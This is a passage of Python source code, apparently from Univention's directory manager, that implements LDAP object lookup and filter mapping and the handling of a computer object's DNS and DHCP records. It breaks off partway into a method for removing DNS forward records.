self.alloc should contain a 2-tuple or 3-tuple:\n (name:str, value:str) or (name:str, value:str, updateLastUsedValue:bool)\n \"\"\"\n while self.alloc:\n item = self.alloc.pop()\n name, value = item[0:2]\n updateLastUsedValue = True\n if len(item) > 2:\n updateLastUsedValue = item[2]\n univention.admin.allocators.confirm(self.lo, self.position, name, value, updateLastUsedValue=updateLastUsedValue)\n\n def request_lock(self, name, value=None, updateLastUsedValue=True):\n \"\"\"Request a lock for the given value\"\"\"\n try:\n if name == 'sid+user':\n value = univention.admin.allocators.requestUserSid(self.lo, self.position, value)\n name = 'sid'\n else:\n value = univention.admin.allocators.request(self.lo, self.position, name, value)\n except univention.admin.uexceptions.noLock:\n self._release_locks(name)\n raise\n if not updateLastUsedValue: # backwards compatibility: 2er-tuples required!\n self.alloc.append((name, value, updateLastUsedValue))\n else:\n self.alloc.append((name, value))\n return value\n\n def _call_checkLdap_on_all_property_syntaxes(self): # type: () -> None\n \"\"\"\n Calls checkLdap() method on every property if present.\n checkLdap() may raise an exception if the value does not match the constraints of the underlying syntax.\n\n .. 
deprecated:: 5.0-2\n Univention internal use only!\n \"\"\"\n for pname, prop in self.descriptions.items():\n if hasattr(prop.syntax, 'checkLdap') and (not self.exists() or self.hasChanged(pname)):\n if len(getfullargspec(prop.syntax.checkLdap).args) > 3:\n prop.syntax.checkLdap(self.lo, self.info.get(pname), pname)\n else:\n prop.syntax.checkLdap(self.lo, self.info.get(pname))\n\n def __prevent_ad_property_change(self): # type: () -> None\n if not _prevent_to_change_ad_properties or not self._is_synced_object():\n return\n\n for key in self.descriptions:\n if self.descriptions[key].readonly_when_synced:\n value = self.info.get(key)\n oldval = self.oldinfo.get(key)\n if oldval != value:\n raise univention.admin.uexceptions.valueMayNotChange(_('key=%(key)s old=%(old)s new=%(new)s') % {'key': key, 'old': oldval, 'new': value}, property=key)\n\n def _is_synced_object(self): # type: () -> bool\n \"\"\"Checks whether this object was synchronized from Active Directory to UCS.\"\"\"\n flags = self.oldattr.get('univentionObjectFlag', [])\n return b'synced' in flags and b'docker' not in flags\n\n @classmethod\n def get_default_containers(cls, lo):\n \"\"\"\n Returns list of default containers for this module.\n\n :param univention.admin.uldap.access lo: UDM LDAP access object.\n \"\"\"\n containers = univention.admin.modules.defaultContainers(univention.admin.modules.get_module(cls.module))\n settings_directory = univention.admin.modules.get_module('settings/directory')\n try:\n default_containers = settings_directory.lookup(None, lo, '', required=True)[0]\n except univention.admin.uexceptions.noObject:\n return containers\n\n base = cls.module.split('/', 1)[0]\n if cls.module in ('shares/print', 'shares/printer', 'shares/printergroup'):\n base = 'printers'\n elif cls.module in ('computers/domaincontroller_master', 'computers/domaincontroller_backup', 'computers/domaincontroller_slave', 'computers/windows_domaincontroller'):\n base = 'domaincontroller'\n\n 
containers.extend(default_containers.info.get(base, []))\n return containers\n\n @classmethod\n def lookup(cls, co, lo, filter_s, base='', superordinate=None, scope='sub', unique=False, required=False, timeout=-1, sizelimit=0, serverctrls=None, response=None): # type: (None, univention.admin.uldap.access, str, str, Optional[str], str, bool, bool, int, int, Optional[List], Optional[Dict]) -> List[simpleLdap]\n \"\"\"\n Perform a LDAP search and return a list of instances.\n\n :param None co: obsolete config\n :param univention.admin.uldap.access lo: UDM LDAP access object.\n :param str filter_s: LDAP filter string.\n :param str base: LDAP search base distinguished name.\n :param str superordinate: Distinguished name of a superordinate object.\n :param str scope: Specify the scope of the search to be one of `base`, `base+one`, `one`, `sub`, or `domain` to specify a base object, base plus one-level, one-level, subtree, or children search.\n :param bool unique: Raise an exception if more than one object matches.\n :param bool required: Raise an exception instead of returning an empty dictionary.\n :param int timeout: wait at most `timeout` seconds for a search to complete. `-1` for no limit.\n :param int sizelimit: retrieve at most `sizelimit` entries for a search. 
`0` for no limit.\n :param serverctrls: a list of :py:class:`ldap.controls.LDAPControl` instances sent to the server along with the LDAP request.\n :type serverctrls: list[ldap.controls.LDAPControl]\n :param dict response: An optional dictionary to receive the server controls of the result.\n :return: A list of UDM objects.\n :rtype: list[simpleLdap]\n \"\"\"\n filter_s = cls.lookup_filter(filter_s, lo)\n if superordinate:\n filter_s = cls.lookup_filter_superordinate(filter_s, superordinate)\n filter_str = six.text_type(filter_s or u'')\n attr = cls._ldap_attributes()\n result = []\n for dn, attrs in lo.search(filter_str, base, scope, attr, unique, required, timeout, sizelimit, serverctrls=serverctrls, response=response):\n try:\n result.append(cls(co, lo, None, dn=dn, superordinate=superordinate, attributes=attrs))\n except univention.admin.uexceptions.base as exc:\n ud.debug(ud.ADMIN, ud.ERROR, 'lookup() of object %r failed: %s' % (dn, exc))\n if required and not result:\n raise univention.admin.uexceptions.noObject('lookup(base=%r, filter_s=%r)' % (base, filter_s))\n return result\n\n @classmethod\n def lookup_filter(cls, filter_s=None, lo=None): # type: (Optional[str], Optional[univention.admin.uldap.access]) -> univention.admin.filter.conjunction\n \"\"\"\n Return a LDAP filter as a UDM filter expression.\n\n :param str filter_s: LDAP filter string.\n :param univention.admin.uldap.access lo: UDM LDAP access object.\n :returns: A LDAP filter expression.\n :rtype: univention.admin.filter.conjunction\n\n See :py:meth:`lookup`.\n \"\"\"\n filter_p = cls.unmapped_lookup_filter()\n # there are instances where the lookup/lookup_filter method of an module handler is called before\n # univention.admin.modules.update() was performed. (e.g. 
management/univention-directory-manager-modules/univention-dnsedit)\n module = univention.admin.modules.get_module(cls.module)\n filter_p.append_unmapped_filter_string(filter_s, cls.rewrite_filter, module.mapping)\n return filter_p\n\n @classmethod\n def lookup_filter_superordinate(cls, filter, superordinate):\n return filter\n\n @classmethod\n def unmapped_lookup_filter(cls): # type: () -> univention.admin.filter.conjunction\n \"\"\"\n Return a LDAP filter UDM filter expression.\n\n :returns: A LDAP filter expression.\n :rtype: univention.admin.filter.conjunction\n\n See :py:meth:`lookup_filter`.\n \"\"\"\n filter_conditions = []\n if cls.use_performant_ldap_search_filter:\n filter_conditions.append(univention.admin.filter.expression(u'univentionObjectType', cls.module, escape=True))\n else:\n object_classes = univention.admin.modules.options(cls.module).get(u'default', univention.admin.option()).objectClasses - {u'top', u'univentionPolicy', u'univentionObjectMetadata', u'person'}\n filter_conditions.extend(univention.admin.filter.expression(u'objectClass', ocs) for ocs in object_classes)\n\n return univention.admin.filter.conjunction(u'&', filter_conditions)\n\n @classmethod\n def rewrite_filter(cls, filter, mapping):\n key = filter.variable\n\n try:\n should_map = mapping.shouldMap(key)\n except KeyError:\n should_map = False\n\n if should_map:\n filter.variable = mapping.mapName(key)\n\n if filter.operator == '=*':\n # 1. presence match. We only need to change the variable name. value is not set\n # 2. special case for syntax classes IStates and boolean:\n # properties that are represented as Checkboxes in the\n # frontend should include '(!(propertyName=*))' in the ldap filter\n # if the Checkbox is set to False to also find objects where the property\n # is not set. 
In that case we don't want to map the '*' to a different value.\n return\n\n # management/univention-management-console/src/univention/management/console/acl.py does not call univention.admin.modules.update()\n mod = univention.admin.modules.get_module(cls.module)\n property_ = mod.property_descriptions.get(key)\n\n # map options to corresponding objectClass\n if not property_ and key == 'options' and filter.value in getattr(mod, 'options', {}):\n ocs = mod.options[filter.value]\n filter.variable = u'objectClass'\n if len(ocs.objectClasses) > 1:\n con = univention.admin.filter.conjunction(u'&', [univention.admin.filter.expression(u'objectClass', oc, escape=True) for oc in ocs.objectClasses])\n filter.transform_to_conjunction(con)\n elif ocs.objectClasses:\n filter.value = list(ocs.objectClasses)[0] # noqa: RUF015\n return\n\n if not should_map:\n return\n\n if property_ and not isinstance(filter.value, (list, tuple)):\n if property_.multivalue:\n # special case: mutlivalue properties need to be a list when map()-ing\n filter.value = [filter.value]\n if issubclass(property_.syntax if inspect.isclass(property_.syntax) else type(property_.syntax), univention.admin.syntax.complex):\n # special case: complex syntax properties need to be a list (of lists, if multivalue)\n filter.value = [filter.value]\n\n filter.value = mapping.mapValueDecoded(key, filter.value, encoding_errors='ignore')\n\n if isinstance(filter.value, (list, tuple)) and filter.value:\n # complex syntax\n filter.value = filter.value[0]\n\n @classmethod\n def identify(cls, dn, attr, canonical=False):\n ocs = {x.decode('utf-8') for x in attr.get('objectClass', [])}\n required_object_classes = univention.admin.modules.options(cls.module).get('default', univention.admin.option()).objectClasses - {'top', 'univentionPolicy', 'univentionObjectMetadata', 'person'}\n return (ocs & required_object_classes) == required_object_classes\n\n _static_ldap_attributes = set() # type: Set[str]\n\n @classmethod\n def 
_ldap_attributes(cls): # type: () -> List[str]\n \"\"\"Get a list of additional (operational) LDAP attributes which needs to be fetched from the LDAP server when creating an instance of this object\"\"\"\n return list({'*', 'entryUUID', 'entryCSN', 'modifyTimestamp'} | cls._static_ldap_attributes)\n\n\nclass simpleComputer(simpleLdap):\n\n def __init__(self, co, lo, position, dn='', superordinate=None, attributes=[]):\n simpleLdap.__init__(self, co, lo, position, dn, superordinate, attributes)\n\n self.newPrimaryGroupDn = 0\n self.oldPrimaryGroupDn = 0\n self.ip = []\n self.network_object = False\n self.old_network = 'None'\n self.__saved_dhcp_entry = None\n # read-only attribute containing the FQDN of the host\n self.descriptions['fqdn'] = univention.admin.property(\n short_description='FQDN',\n long_description='',\n syntax=univention.admin.syntax.string,\n may_change=False,\n )\n self['dnsAlias'] = [] # defined here to avoid pseudo non-None value of [''] in modwizard search\n self.oldinfo['ip'] = []\n self.info['ip'] = []\n if self.exists():\n ips = [ip_address(addr.decode('ASCII')).exploded for key in ('aRecord', 'aAAARecord') for addr in self.oldattr.get(key, [])]\n self.oldinfo['ip'] += ips\n self.info['ip'] += ips\n\n def getMachineSid(self, lo, position, uidNum, rid=None):\n # if rid is given, use it regardless of s4 connector\n if rid:\n searchResult = self.lo.search(filter='objectClass=sambaDomain', attr=['sambaSID'])\n domainsid = searchResult[0][1]['sambaSID'][0].decode('ASCII')\n sid = domainsid + u'-' + rid\n return self.request_lock('sid', sid)\n else:\n # if no rid is given, create a domain sid or local sid if connector is present\n if self.s4connector_present:\n return u'S-1-4-%s' % uidNum\n else:\n num = uidNum\n while True:\n try:\n return self.request_lock('sid+user', num)\n except univention.admin.uexceptions.noLock:\n num = str(int(num) + 1)\n\n # HELPER\n @classmethod\n def _ip_from_ptr(cls, zoneName, relativeDomainName): # type: (str, str) 
-> str\n \"\"\"\n Extract IP address from reverse DNS record.\n\n >>> simpleComputer._ip_from_ptr(\"2.1.in-addr.arpa\", \"4.3\")\n '1.2.3.4'\n >>> simpleComputer._ip_from_ptr(\"0.0.0.0.0.0.0.0.0.8.b.d.1.0.0.2.ip6.arpa\", \"1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0\")\n '2001:db80:0000:0000:0000:0000:0000:0001'\n \"\"\"\n if 'ip6' in zoneName:\n return cls._ipv6_from_ptr(zoneName, relativeDomainName)\n else:\n return cls._ipv4_from_ptr(zoneName, relativeDomainName)\n\n @staticmethod\n def _ipv4_from_ptr(zoneName, relativeDomainName): # type: (str, str) -> str\n \"\"\"\n Extract IPv4 address from reverse DNS record.\n\n >>> simpleComputer._ipv4_from_ptr(\"2.1.in-addr.arpa\", \"4.3\")\n '1.2.3.4'\n \"\"\"\n return '%s.%s' % (\n '.'.join(reversed(zoneName.replace('.in-addr.arpa', '').split('.'))),\n '.'.join(reversed(relativeDomainName.split('.'))))\n\n @staticmethod\n def _ipv6_from_ptr(zoneName, relativeDomainName): # type: (str, str) -> str\n \"\"\"\n Extract IPv6 address from reverse DNS record.\n\n >>> simpleComputer._ipv6_from_ptr(\"0.0.0.0.0.0.0.0.0.8.b.d.1.0.0.2.ip6.arpa\", \"1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0\")\n '2001:db80:0000:0000:0000:0000:0000:0001'\n \"\"\"\n fullName = relativeDomainName + '.' + zoneName.replace('.ip6.arpa', '')\n digits = fullName.split('.')\n blocks = [''.join(reversed(digits[i:i + 4])) for i in range(0, len(digits), 4)]\n return ':'.join(reversed(blocks))\n\n @staticmethod\n def _is_ip(ip): # type: (str) -> bool\n \"\"\"\n Check if valid IPv4 (0.0.0.0 is allowed) or IPv6 address.\n\n :param ip: string.\n :returns: `True` if it is a valid IPv4 or IPv6 address., `False` otherwise.\n\n >>> simpleComputer._is_ip('192.0.2.0')\n True\n >>> simpleComputer._is_ip('::1')\n True\n >>> simpleComputer._is_ip('')\n False\n \"\"\"\n try:\n ip_address(u'%s' % (ip,))\n ud.debug(ud.ADMIN, ud.INFO, 'IP[%s]? -> Yes' % ip)\n return True\n except ValueError:\n ud.debug(ud.ADMIN, ud.INFO, 'IP[%s]? 
-> No' % ip)\n return False\n\n def open(self):\n \"\"\"Load the computer object from LDAP.\"\"\"\n simpleLdap.open(self)\n\n self.newPrimaryGroupDn = 0\n self.oldPrimaryGroupDn = 0\n self.ip_alredy_requested = 0\n self.ip_freshly_set = False\n\n self.__multiip = len(self['mac']) > 1 or len(self['ip']) > 1\n\n self['dnsEntryZoneForward'] = []\n self['dnsEntryZoneReverse'] = []\n self['dhcpEntryZone'] = []\n self['groups'] = []\n self['dnsEntryZoneAlias'] = []\n\n # search forward zone and insert into the object\n if self['name']:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n zones = []\n\n searchFilter = filter_format('(&(objectClass=dNSZone)(relativeDomainName=%s)(!(cNAMERecord=*)))', [self['name']])\n try:\n result = self.lo.search(base=tmppos.getBase(), scope='domain', filter=searchFilter, attr=['zoneName', 'aRecord', 'aAAARecord'], unique=False)\n for dn, attr in result:\n zoneName = attr['zoneName'][0].decode('UTF-8')\n for key in ('aRecord', 'aAAARecord'):\n if key in attr:\n zones.append((zoneName, [ip_address(x.decode('ASCII')).exploded for x in attr[key]]))\n\n ud.debug(ud.ADMIN, ud.INFO, 'zoneNames: %s' % zones)\n for zoneName, ips in zones:\n searchFilter = filter_format('(&(objectClass=dNSZone)(zoneName=%s)(relativeDomainName=@))', [zoneName])\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=searchFilter, unique=False)\n for dn in results:\n for ip in ips:\n self['dnsEntryZoneForward'].append([dn, ip])\n ud.debug(ud.ADMIN, ud.INFO, 'dnsEntryZoneForward: %s' % (self['dnsEntryZoneForward'],))\n except univention.admin.uexceptions.insufficientInformation:\n self['dnsEntryZoneForward'] = []\n raise\n\n for zoneName, ips in zones:\n searchFilter = filter_format('(&(objectClass=dNSZone)(|(PTRRecord=%s)(PTRRecord=%s.%s.)))', (self['name'], self['name'], zoneName))\n try:\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['relativeDomainName', 'zoneName'], filter=searchFilter, 
unique=False)\n for dn, attr in results:\n ip = self._ip_from_ptr(attr['zoneName'][0].decode('UTF-8'), attr['relativeDomainName'][0].decode('UTF-8'))\n if not self._is_ip(ip):\n ud.debug(ud.ADMIN, ud.WARN, 'simpleComputer: dnsEntryZoneReverse: invalid IP address generated: %r' % (ip,))\n continue\n entry = [self.lo.parentDn(dn), ip]\n if entry not in self['dnsEntryZoneReverse']:\n self['dnsEntryZoneReverse'].append(entry)\n except univention.admin.uexceptions.insufficientInformation:\n self['dnsEntryZoneReverse'] = []\n raise\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dnsEntryZoneReverse: %s' % self['dnsEntryZoneReverse'])\n\n for zoneName, ips in zones:\n searchFilter = filter_format('(&(objectClass=dNSZone)(|(cNAMERecord=%s)(cNAMERecord=%s.%s.)))', (self['name'], self['name'], zoneName))\n try:\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['relativeDomainName', 'cNAMERecord', 'zoneName'], filter=searchFilter, unique=False)\n for dn, attr in results:\n dnsAlias = attr['relativeDomainName'][0].decode('UTF-8')\n self['dnsAlias'].append(dnsAlias)\n dnsAliasZoneContainer = self.lo.parentDn(dn)\n if attr['cNAMERecord'][0].decode('UTF-8') == self['name']:\n dnsForwardZone = attr['zoneName'][0].decode('UTF-8')\n else:\n dnsForwardZone = zoneName\n\n entry = [dnsForwardZone, dnsAliasZoneContainer, dnsAlias]\n if entry not in self['dnsEntryZoneAlias']:\n self['dnsEntryZoneAlias'].append(entry)\n except univention.admin.uexceptions.insufficientInformation:\n self['dnsEntryZoneAlias'] = []\n raise\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dnsEntryZoneAlias: %s' % self['dnsEntryZoneAlias'])\n\n for macAddress in self['mac']:\n # mac address may be an empty string (Bug #21958)\n if not macAddress:\n continue\n\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; we have a mac address: %s' % macAddress)\n ethernet = 'ethernet ' + macAddress\n searchFilter = filter_format('(&(dhcpHWAddress=%s)(objectClass=univentionDhcpHost))', (ethernet,))\n 
ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; we search for \"%s\"' % searchFilter)\n try:\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=searchFilter, unique=False)\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; the result: \"%s\"' % results)\n for dn, attr in results:\n service = self.lo.parentDn(dn)\n if 'univentionDhcpFixedAddress' in attr:\n for ip in attr['univentionDhcpFixedAddress']:\n entry = (service, ip.decode('ASCII'), macAddress)\n if entry not in self['dhcpEntryZone']:\n self['dhcpEntryZone'].append(entry)\n else:\n entry = (service, '', macAddress)\n if entry not in self['dhcpEntryZone']:\n self['dhcpEntryZone'].append(entry)\n ud.debug(ud.ADMIN, ud.INFO, 'open: DHCP; self[ dhcpEntryZone ] = \"%s\"' % self['dhcpEntryZone'])\n\n except univention.admin.uexceptions.insufficientInformation:\n raise\n\n if self.exists():\n if self.has_property('network'):\n self.old_network = self['network']\n\n # get groupmembership\n self['groups'] = self.lo.searchDn(base=self.lo.base, filter=filter_format('(&(objectclass=univentionGroup)(uniqueMember=%s))', [self.dn]))\n\n if 'name' in self.info and 'domain' in self.info:\n self.info['fqdn'] = '%s.%s' % (self['name'], self['domain'])\n\n def __modify_dhcp_object(self, position, mac, ip=None):\n # identify the dhcp object with the mac address\n\n name = self['name']\n ud.debug(ud.ADMIN, ud.INFO, '__modify_dhcp_object: position: \"%s\"; name: \"%s\"; mac: \"%s\"; ip: \"%s\"' % (position, name, mac, ip))\n if not all((name, mac)):\n return\n\n ethernet = 'ethernet %s' % mac\n bip = ip.encode('ASCII') if ip else b''\n\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n if not position:\n ud.debug(ud.ADMIN, ud.WARN, 'could not access network object and given position is \"None\", using LDAP root as position for DHCP entry')\n position = tmppos.getBase()\n results = self.lo.search(base=position, scope='domain', attr=['univentionDhcpFixedAddress'], 
filter=filter_format('dhcpHWAddress=%s', [ethernet]), unique=False)\n\n if not results:\n # if the dhcp object doesn't exists, then we create it\n # but it is possible, that the hostname for the dhcp object is already used, so we use the _uv$NUM extension\n\n ud.debug(ud.ADMIN, ud.INFO, 'the dhcp object with the mac address \"%s\" does not exists, we create one' % ethernet)\n\n results = self.lo.searchDn(base=position, scope='domain', filter=filter_format('(&(objectClass=univentionDhcpHost)(|(cn=%s)(cn=%s_uv*)))', (name, name)), unique=False)\n if results:\n ud.debug(ud.ADMIN, ud.INFO, 'the host \"%s\" already has a dhcp object, so we search for the next free uv name' % (name))\n RE = re.compile(r'cn=[^,]+_uv(\\d+),')\n taken = {int(m.group(1)) for m in (RE.match(dn) for dn in results) if m}\n n = min(set(range(max(taken) + 2)) - taken) if taken else 0\n name = '%s_uv%d' % (name, n)\n\n dn = 'cn=%s,%s' % (escape_dn_chars(name), position)\n ml = [\n ('objectClass', [b'top', b'univentionObject', b'univentionDhcpHost']),\n ('univentionObjectType', [b'dhcp/host']),\n ('cn', [name.encode('UTF-8')]),\n ('dhcpHWAddress', [ethernet.encode('ASCII')]),\n ]\n if ip:\n ml.append(('univentionDhcpFixedAddress', [bip]))\n self.lo.add(dn, ml)\n ud.debug(ud.ADMIN, ud.INFO, 'we just added the object \"%s\"' % (dn,))\n elif ip:\n # if the object already exists, we append or remove the ip address\n ud.debug(ud.ADMIN, ud.INFO, 'the dhcp object with the mac address \"%s\" exists, we change the ip' % ethernet)\n for dn, attr in results:\n if bip in attr.get('univentionDhcpFixedAddress', []):\n continue\n self.lo.modify(dn, [('univentionDhcpFixedAddress', b'', bip)])\n ud.debug(ud.ADMIN, ud.INFO, 'we added the ip \"%s\"' % ip)\n\n def __rename_dns_object(self, position=None, old_name=None, new_name=None):\n for dns_line in self['dnsEntryZoneForward']:\n # dns_line may be the empty string\n if not dns_line:\n continue\n dn, ip = self.__split_dns_line(dns_line)\n if ':' in ip: # IPv6\n 
results = self.lo.searchDn(base=dn, scope='domain', filter=filter_format('(&(relativeDomainName=%s)(aAAARecord=%s))', (old_name, ip)), unique=False)\n else:\n results = self.lo.searchDn(base=dn, scope='domain', filter=filter_format('(&(relativeDomainName=%s)(aRecord=%s))', (old_name, ip)), unique=False)\n for result in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dns/host_record'), self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['name'] = new_name\n object.modify()\n for dns_line in self['dnsEntryZoneReverse']:\n # dns_line may be the empty string\n if not dns_line:\n continue\n dn, ip = self.__split_dns_line(dns_line)\n results = self.lo.searchDn(base=dn, scope='domain', filter=filter_format('(|(pTRRecord=%s)(pTRRecord=%s.*))', (old_name, old_name)), unique=False)\n for result in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dns/ptr_record'), self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['ptr_record'] = [ptr_record.replace(old_name, new_name) for ptr_record in object.get('ptr_record', [])]\n object.modify()\n for entry in self['dnsEntryZoneAlias']:\n # entry may be the empty string\n if not entry:\n continue\n dnsforwardzone, dnsaliaszonecontainer, alias = entry\n results = self.lo.searchDn(base=dnsaliaszonecontainer, scope='domain', filter=filter_format('relativedomainname=%s', [alias]), unique=False)\n for result in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dns/alias'), self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['cname'] = '%s.%s.' 
% (new_name, dnsforwardzone)\n object.modify()\n\n def __rename_dhcp_object(self, old_name, new_name):\n module = univention.admin.modules.get('dhcp/host')\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n for mac in self['mac']:\n # mac may be the empty string\n if not mac:\n continue\n ethernet = 'ethernet %s' % mac\n\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('dhcpHWAddress=%s', [ethernet]), unique=False)\n if not results:\n continue\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: filter [ dhcpHWAddress = %s ]; results: %s' % (ethernet, results))\n\n for result in results:\n object = univention.admin.objects.get(module, self.co, self.lo, position=self.position, dn=result)\n object.open()\n object['host'] = object['host'].replace(old_name, new_name)\n object.modify()\n\n def __remove_from_dhcp_object(self, mac=None, ip=None):\n # if we got the mac address, then we remove the object\n # if we only got the ip address, we remove the ip address\n\n ud.debug(ud.ADMIN, ud.INFO, 'we should remove a dhcp object: mac=\"%s\", ip=\"%s\"' % (mac, ip))\n\n dn = None\n\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n if ip and mac:\n ethernet = 'ethernet %s' % mac\n ud.debug(ud.ADMIN, ud.INFO, 'we only remove the ip \"%s\" from the dhcp object' % ip)\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('(&(dhcpHWAddress=%s)(univentionDhcpFixedAddress=%s))', (ethernet, ip)), unique=False)\n for dn, _attr in results:\n object = univention.admin.objects.get(univention.admin.modules.get('dhcp/host'), self.co, self.lo, position=self.position, dn=dn)\n object.open()\n if ip in object['fixedaddress']:\n ud.debug(ud.ADMIN, ud.INFO, 'fixedaddress: \"%s\"' % object['fixedaddress'])\n object['fixedaddress'].remove(ip)\n if len(object['fixedaddress']) == 0:\n object.remove()\n else:\n object.modify()\n dn = object.dn\n\n elif 
mac:\n ethernet = 'ethernet %s' % mac\n ud.debug(ud.ADMIN, ud.INFO, 'Remove the following mac: ethernet: \"%s\"' % ethernet)\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('dhcpHWAddress=%s', [ethernet]), unique=False)\n for dn, _attr in results:\n ud.debug(ud.ADMIN, ud.INFO, '... done')\n object = univention.admin.objects.get(univention.admin.modules.get('dhcp/host'), self.co, self.lo, position=self.position, dn=dn)\n object.remove()\n dn = object.dn\n\n elif ip:\n ud.debug(ud.ADMIN, ud.INFO, 'Remove the following ip: \"%s\"' % ip)\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['univentionDhcpFixedAddress'], filter=filter_format('univentionDhcpFixedAddress=%s', [ip]), unique=False)\n for dn, _attr in results:\n ud.debug(ud.ADMIN, ud.INFO, '... done')\n object = univention.admin.objects.get(univention.admin.modules.get('dhcp/host'), self.co, self.lo, position=self.position, dn=dn)\n object.remove()\n dn = object.dn\n\n return dn\n\n def __split_dhcp_line(self, entry):\n service = entry[0]\n ip = ''\n try:\n # sanitize mac address\n # 0011.2233.4455 -> 00:11:22:33:44:55 -> is guaranteed to work together with our DHCP server\n # __split_dhcp_line may be used outside of UDM which means that MAC_Address.parse may not be called.\n mac = univention.admin.syntax.MAC_Address.parse(entry[-1])\n if self._is_ip(entry[-2]):\n ip = entry[-2]\n except univention.admin.uexceptions.valueError:\n mac = ''\n return (service, ip, mac)\n\n def __split_dns_line(self, entry):\n zone = entry[0]\n ip = self._is_ip(entry[1]) and entry[1] or None if len(entry) > 1 else None\n\n ud.debug(ud.ADMIN, ud.INFO, 'Split entry %s into zone %s and ip %s' % (entry, zone, ip))\n return (zone, ip)\n\n def __remove_dns_reverse_object(self, name, dnsEntryZoneReverse, ip): # type: (str, str, str) -> None\n def modify(rdn, zoneDN): # type: (Text, str) -> None\n zone_name = explode_rdn(zoneDN, True)[0]\n for 
dn, attributes in self.lo.search(scope='domain', attr=['pTRRecord'], filter=filter_format('(&(relativeDomainName=%s)(zoneName=%s))', (rdn, zone_name))):\n ptr_records = attributes.get('pTRRecord', [])\n removals = []\n if len(ptr_records) > 1:\n removals = [b'%s.%s.' % (name.encode('UTF-8'), attributes2['zoneName'][0]) for dn2, attributes2 in self.lo.search(scope='domain', attr=['zoneName'], filter=filter_format('(&(relativeDomainName=%s)(objectClass=dNSZone))', [name]), unique=False)]\n\n if len(ptr_records) <= 1 or set(ptr_records) == set(removals):\n self.lo.delete('relativeDomainName=%s,%s' % (escape_dn_chars(rdn), zoneDN))\n else:\n self.lo.modify(dn, [('pTRRecord', removals, b'')])\n\n zone = univention.admin.handlers.dns.reverse_zone.object(self.co, self.lo, self.position, zoneDN)\n zone.open()\n zone.modify()\n\n ud.debug(ud.ADMIN, ud.INFO, 'we should remove a dns reverse object: dnsEntryZoneReverse=\"%s\", name=\"%s\", ip=\"%s\"' % (dnsEntryZoneReverse, name, ip))\n if dnsEntryZoneReverse:\n try:\n rdn = self.calc_dns_reverse_entry_name(ip, dnsEntryZoneReverse)\n except ValueError:\n pass\n else:\n modify(rdn, dnsEntryZoneReverse)\n\n elif ip:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['zoneDn'], filter=filter_format('(&(objectClass=dNSZone)(|(pTRRecord=%s)(pTRRecord=%s.*)))', (name, name)), unique=False)\n for dn, _attr in results:\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: dn: \"%s\"' % dn)\n zone = self.lo.parentDn(dn)\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: zone: \"%s\"' % zone)\n try:\n rdn = self.calc_dns_reverse_entry_name(ip, zone)\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: rdn: \"%s\"' % rdn)\n modify(rdn, zone)\n except ValueError as ex:\n ud.debug(ud.ADMIN, ud.INFO, 'DEBUG: rdn: \"%s\"' % ex)\n except univention.admin.uexceptions.noObject:\n pass\n\n def __add_dns_reverse_object(self, name, zoneDn, ip): # type: (str, str, str) -> None\n ud.debug(ud.ADMIN, 
ud.INFO, 'we should create a dns reverse object: zoneDn=\"%s\", name=\"%s\", ip=\"%s\"' % (zoneDn, name, ip))\n if not all((name, zoneDn, ip)):\n return\n\n addr, attr = self._ip2dns(ip)\n try:\n ipPart = self.calc_dns_reverse_entry_name(ip, zoneDn)\n except ValueError:\n raise univention.admin.uexceptions.missingInformation(_('Reverse zone and IP address are incompatible.'))\n\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n results = self.lo.search(base=tmppos.getBase(), scope='domain', attr=['zoneName'], filter=filter_format('(&(relativeDomainName=%s)(zoneName=*)(%s=%s))', (name, attr, addr.exploded)), unique=False)\n hostname_list = {\n u'%s.%s.' % (name, attr['zoneName'][0].decode('UTF-8'))\n for dn, attr in results\n }\n if not hostname_list:\n ud.debug(ud.ADMIN, ud.ERROR, 'Could not determine host record for name=%r, ip=%r. Not creating pointer record.' % (name, ip))\n return\n\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('(&(relativeDomainName=%s)(%s=%s))', [ipPart] + list(str2dn(zoneDn)[0][0][:2])), unique=False)\n if not results:\n self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(ipPart), zoneDn), [\n ('objectClass', [b'top', b'dNSZone', b'univentionObject']),\n ('univentionObjectType', [b'dns/ptr_record']),\n ('zoneName', [explode_rdn(zoneDn, True)[0].encode('UTF-8')]),\n ('relativeDomainName', [ipPart.encode('ASCII')]),\n ('PTRRecord', [x.encode('UTF-8') for x in hostname_list]),\n ])\n\n # update Serial\n zone = univention.admin.handlers.dns.reverse_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n\n def __remove_dns_forward_object(self, name, zoneDn, ip=None): # type: (str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 